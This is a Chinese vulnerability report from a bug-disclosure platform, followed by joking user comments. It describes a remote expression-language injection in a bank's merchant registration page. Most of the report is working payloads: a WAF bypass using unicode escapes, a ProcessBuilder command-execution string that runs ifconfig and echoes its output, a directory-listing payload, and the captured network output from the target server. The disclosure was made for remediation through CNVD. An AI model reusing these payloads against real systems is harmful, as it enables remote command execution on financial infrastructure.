工商银行某系统存在远程EL表达式注入漏洞(命令执行)

#1 漏洞描述

EL表达式语法允许开发人员开发自定义函数，以调用Java类的方法

#2 影响服务器

http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtml

#3 Paylod

groupName=1&papersType=${9999999-444}&papersValue=1&baseacct=1&retMsg=1&retCode=1

#4 绕过WAF

http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtml
 companyName=999&groupName=&papersType=${"a9999abbb".toString/u0028/u0029}&papersValue=1&baseacct=1&retMsg=1&retCode=1

#5 回显命令执行

groupName=1&papersType=${%23a%3d/u0028new%20java.lang.ProcessBuilder/u0028new%20java.lang.String[]{/u0027/sbin/ifconfig/u0027,/u0027-a/u0027}/u0029/u0029.start/u0028/u0029,%23b%3d%23a.getInputStream/u0028/u0029,%23c%3dnew%**.**.**.**.InputStreamReader/u0028%23b/u0029,%23d%3dnew%**.**.**.**.BufferedReader/u0028%23c/u0029,%23e%3dnew%20char[50000],%23d.read/u0028%23e/u0029,%23ringzero%3d%23context.get/u0028/u0027com.opensymphony.xwork2.dispatcher.HttpServletResponse/u0027/u0029,%23ringzero.getWriter/u0028/u0029.println/u0028%23e/u0029,%23ringzero.getWriter/u0028/u0029.flush/u0028/u0029,%23ringzero.getWriter/u0028/u0029.close/u0028/u0029}&papersValue=1&baseacct=1&retMsg=1&retCode=1

${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'/sbin/ifconfig','-a'})).start(),#b=#a.getInputStream(),#c=new **.**.**.**.InputStreamReader(#b),#d=new **.**.**.**.BufferedReader(#c),#e=new char[50000],#d.read(#e),#ringzero=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#ringzero.getWriter().println(#e),#ringzero.getWriter().flush(),#ringzero.getWriter().close()}

eth5      Link encap:Ethernet  HWaddr 00:50:56:97:7A:74  
           inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
           RX packets:5603928546 errors:0 dropped:0 overruns:0 frame:0
           TX packets:8131434126 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:735168104896 (701110.9 Mb)  TX bytes:11750604019014 (11206249.2 Mb)
 
 lo        Link encap:Local Loopback  
           inet addr:**.**.**.**  Mask:**.**.**.**
           UP LOOPBACK RUNNING  MTU:16436  Metric:1
           RX packets:51371053 errors:0 dropped:0 overruns:0 frame:0
           TX packets:51371053 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0 
           RX bytes:25387430681 (24211.3 Mb)  TX bytes:25387430681 (24211.3 Mb)

#6 列目录

groupName=1&papersType=${new **.**.**.**.File(/u0027//u0027).listFiles()[1]}&papersValue=1&baseacct=1&retMsg=1&retCode=1

# 表达式不允许来自客户端调用

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-04-18 15:23

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT直接通报给对应银行集团公司,由其后续协调网站管理部门处置.

最新状态：

暂无

1. 2016-04-14 14:33 | 牛 小 帅 ( 普通白帽子 | Rank:1597 漏洞数:386 | bye)

   1

   黑阔

   1# 回复此人

2. 2016-04-14 14:34 | cwkiller ( 普通白帽子 | Rank:174 漏洞数:39 | 闭关修炼)

   2

   我再也不欠你什么了

   2# 回复此人

3. 2016-04-14 14:35 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

   3

   这个漏洞只影响有钱人，大富大贵洞

   3# 回复此人

4. 2016-04-14 14:36 | PiaCa ( 普通白帽子 | Rank:137 漏洞数:11 | 简单点! 啪......嚓~~)

   1

   富贵洞

   4# 回复此人

5. 2016-04-14 14:39 | zsmj ( 普通白帽子 | Rank:243 漏洞数:34 | 蛛丝马迹！)

   1

   吓得我抓紧看看卡里余额有没有少

   5# 回复此人

6. 2016-04-14 14:43 | Vinc ( 普通白帽子 | Rank:383 漏洞数:58 | 提莫队长正在待命！)

   2

   -

   6# 回复此人

7. 2016-04-14 14:44 | whynot ( 普通白帽子 | Rank:678 漏洞数:136 | 为你解冻冰河 为你放弃世界有何不可)

   1

   大富大贵洞 吓得我差点把卡里俩毛钱取出来

   7# 回复此人

8. 2016-04-14 14:45 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高，标题一定得屌)

   1

   !!!!

   8# 回复此人

9. 2016-04-14 14:58 | 浩天 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈！躁起来！)

   1

   好姿势

   9# 回复此人

10. 2016-04-14 15:00 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:32 | 不是因为看到了希望才去努力，而是努力了才...)

    1

    我表示关注

    10# 回复此人

11. 2016-04-14 15:04 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    1

    哈喇子

    11# 回复此人

12. 2016-04-14 15:05 | 龚稳 ( 实习白帽子 | Rank:50 漏洞数:18 | 没有做不到的，只有不想做的)

    1

    唉 我是说我卡里怎么扫了18块 原来如此啊

    12# 回复此人

13. 2016-04-14 15:06 | SREAUDIO ( 实习白帽子 | Rank:42 漏洞数:13 | 努力学习，磨练技术)

    1

    @浩天 我有一个漏洞5天了还没审，求教

    13# 回复此人

14. 2016-04-14 15:11 | 鱼化石 ( 实习白帽子 | Rank:93 漏洞数:18 | 介绍不能为空)

    1

    吓得我赶紧看看卡里余额有没有多！

    14# 回复此人

15. 2016-04-14 15:11 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒，就没有什么事是【撸串...)

    1

    就这 JC 还不查水表？ 那就奇怪了。

    15# 回复此人

16. 2016-04-14 15:14 | Taro ( 普通白帽子 | Rank:349 漏洞数:86 | 走向最远的方向，哪怕前路迷茫；抱着最大的...)

    1

    嚇得我都不管是用工商銀行卡了

    16# 回复此人

17. 2016-04-14 15:18 | Martial ( 普通白帽子 | Rank:2639 漏洞数:370 | 竟然还有人冒充我，醉了，骗子QQ445697541...)

    2

    这个漏洞只影响有钱人,大家可以放心了 - -~!

    17# 回复此人

18. 2016-04-14 15:35 | 苏安泽 ( 普通白帽子 | Rank:194 漏洞数:55 | 一个想成为演员的黑客~)

    2

    我收到我的银行卡消费信息，吓到我赶紧骑单车去银行查。结果...发现我卡里的5毛钱还在，真是吓死人了！

    18# 回复此人

19. 2016-04-14 15:51 | xxsec ( 路人 | Rank:10 漏洞数:8 | kali，metasploit)

    1

    吓死我了，赶紧狂奔到银行查了下卡里的2块3毛8···

    19# 回复此人

20. 2016-04-14 16:03 | 萨瓦迪卡 ( 普通白帽子 | Rank:128 漏洞数:21 | 黑太子)

    1

    你裤腿侧面破了吧

    20# 回复此人

21. 2016-04-14 16:17 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高，标题一定得屌)

    1

    @苏安泽 你自行车呢？

    21# 回复此人

22. 2016-04-14 16:22 | by黑桃 ( 实习白帽子 | Rank:95 漏洞数:37 | 昨晚和老公大吵了一架，今天早上来大夷妈了...)

    1

    把楼上的人全部带走

    22# 回复此人

23. 2016-04-14 16:33 | 兔八哥 ( 实习白帽子 | Rank:41 漏洞数:6 | 我心飞 翔)

    1

    我卡里也有好几块啊，在村里也算是有钱人了，要不要报警，急，在线等

    23# 回复此人

24. 2016-04-14 16:47 | 乐乐 ( 普通白帽子 | Rank:251 漏洞数:73 | 一名信息安全员)

    1

    也来围观一下

    24# 回复此人

25. 2016-04-14 16:57 | xiya ( 路人 | Rank:5 漏洞数:1 )

    1

    要不要报警，急，在线等

    25# 回复此人

26. 2016-04-14 17:07 | 0h1in9e ( 实习白帽子 | Rank:68 漏洞数:23 | 林歌 | 峨眉山下修炼中的<网络安全></web开...)

    1

    吓得我赶紧看看卡里余额有没有多！

    26# 回复此人

27. 2016-04-14 17:37 | 睾大强 ( 路人 | Rank:6 漏洞数:3 | there are five stages,denial,then anger,...)

    1

    什么时候能影响我啊 求备影响

    27# 回复此人

28. 2016-04-14 17:43 | socket ( 实习白帽子 | Rank:55 漏洞数:21 | )

    1

    666搞银行。。

    28# 回复此人

29. 2016-04-14 19:39 | 白骨夫人 ( 普通白帽子 | Rank:248 漏洞数:56 | 白骨夫人，白只做白的，骨就是骨气，夫人就...)

    1

    牛逼啊 ，，， 混个熟脸

    29# 回复此人

30. 2016-04-14 19:49 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

    1

    好牛逼

    30# 回复此人

31. 2016-04-14 20:00 | 听听鸟叫 ( 路人 | Rank:14 漏洞数:4 | 看看天空)

    1

    沾点牛气

    31# 回复此人

32. 2016-04-14 22:03 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    1

    @白骨夫人

    32# 回复此人

33. 2016-04-14 22:28 | 苏安泽 ( 普通白帽子 | Rank:194 漏洞数:55 | 一个想成为演员的黑客~)

    1

    @路人毛 卖了

    33# 回复此人

34. 2016-04-19 07:58 | J3c0sk ( 路人 | Rank:4 漏洞数:2 | *)

    0

    等死吧,劳资已经报警了

    34# 回复此人

35. 2016-06-02 16:17 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号：233sec 不定期分享各种漏洞思...)

    0

    滴血的漏洞？？66

    35# 回复此人

36. 2016-06-02 16:34 | Jovi ( 路人 | Rank:4 漏洞数:1 )

    0

    没闪电只有滴血

    36# 回复此人

37. 2016-06-02 16:44 | JiuShao ( 普通白帽子 | Rank:495 漏洞数:109 | ╮(╯▽╰)╭锄禾日当午)

    0

    第一滴血

    37# 回复此人

38. 2016-06-02 17:11 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    0

    @随风的风 前几天就有了,又不是今天出的

    38# 回复此人

39. 2016-06-02 17:22 | 暴走 ( 普通白帽子 | Rank:615 漏洞数:107 | 专心补刀。)

    0

    后面的那个红色点代表什么意思啊？

    39# 回复此人

40. 2016-06-02 21:24 | Any3ite ( 路人 | Rank:26 漏洞数:12 | 土耳其web 国内的我就看看不说话)

    0

    吓死我了，赶紧狂奔到银行查了下卡里的2块3毛8···

    40# 回复此人